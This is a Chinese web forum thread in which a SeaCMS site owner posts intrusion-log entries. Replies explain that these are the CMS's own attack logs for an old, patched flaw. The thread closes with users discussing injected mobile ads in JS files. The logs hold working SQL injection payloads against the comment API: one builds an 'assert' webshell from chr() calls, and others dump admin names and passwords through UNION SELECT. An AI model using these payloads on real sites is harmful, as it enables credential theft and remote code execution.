阅读:2213回复:6

发现海洋CMS程序老是被挂马

楼主#
更多 发布于:2021-12-12 16:27
海洋CMS程序老是被sQL注入  全在data文件夹下生成PHP文件   注入的代码如下



113.128.35.216||/comment/api/index.php?gid=1&page=2&rlist[]=*hex/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?%3E||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (*hex/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?>) AND ischeck=1 ORDER BY id DESC limit 10||unusual character
107.148.224.118||//comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
198.144.159.130||//comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
198.144.159.130||/comment/api/index.php?gid=22&page=9&type=3&rlist[]=1)//**@%60'%60**@//UNION%20SELECT%23%0aname,password,null,null,null,null,null,null,null,null,null%23%0afrom%23%0asea_admin--%20@%60'%60||SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=3 AND id in (1)//**@`\'`**@//UNION SELECT#
name,password,null,null,null,null,null,null,null,null,null#
from#
sea_admin-- @`\'`) AND ischeck=1 ORDER BY id DESC limit 10||comment detect
1楼#
发布于:2021-12-12 17:18
如果开启了攻击记录,海洋cms会在data目录下记录被攻击的日志。
方便站长查看攻击详情。
这个文件只是记录了攻击信息,并不代表你的系统被成功注入了。

生成的文件是在data目录下,类似:
0ab9b294a60790b38ad33aa133db25d1_safe.txt
文件格式应该是txt文本文件。
2楼#
发布于:2021-12-12 17:20
而且针对
/comment/api/index.php?gid=1&page=...................
这种形式的注入攻击,都是几年之前的漏洞了。
海洋cms几年前就修复了该问题,系统会直接拦截类似攻击。
3楼#
发布于:2021-12-15 22:08
我新站,还没绑定域名刚上线就挂上广告 全在模板的js上面
4楼#
发布于:2021-12-16 10:47
hzw159357:我新站,还没绑定域名刚上线就挂上广告 全在模板的js上面回到原帖
你的是挂哪个JS文件,我的也出现弹直播的广告,手机端才出现,JS文件近期也没有修改时间,怎么看挂在哪呀。
5楼#
发布于:2021-12-21 14:05
aqws:你的是挂哪个JS文件,我的也出现弹直播的广告,手机端才出现,JS文件近期也没有修改时间,怎么看挂在哪呀。回到原帖
我也是手机端才弹广告,你仔细看一下JS文件 ,那些代码都是加密的
6楼#
发布于:2022-01-04 11:22
aqws:你的是挂哪个JS文件,我的也出现弹直播的广告,手机端才出现,JS文件近期也没有修改时间,怎么看挂在哪呀。回到原帖
你的找到了吗?我的还是没找到
游客

返回顶部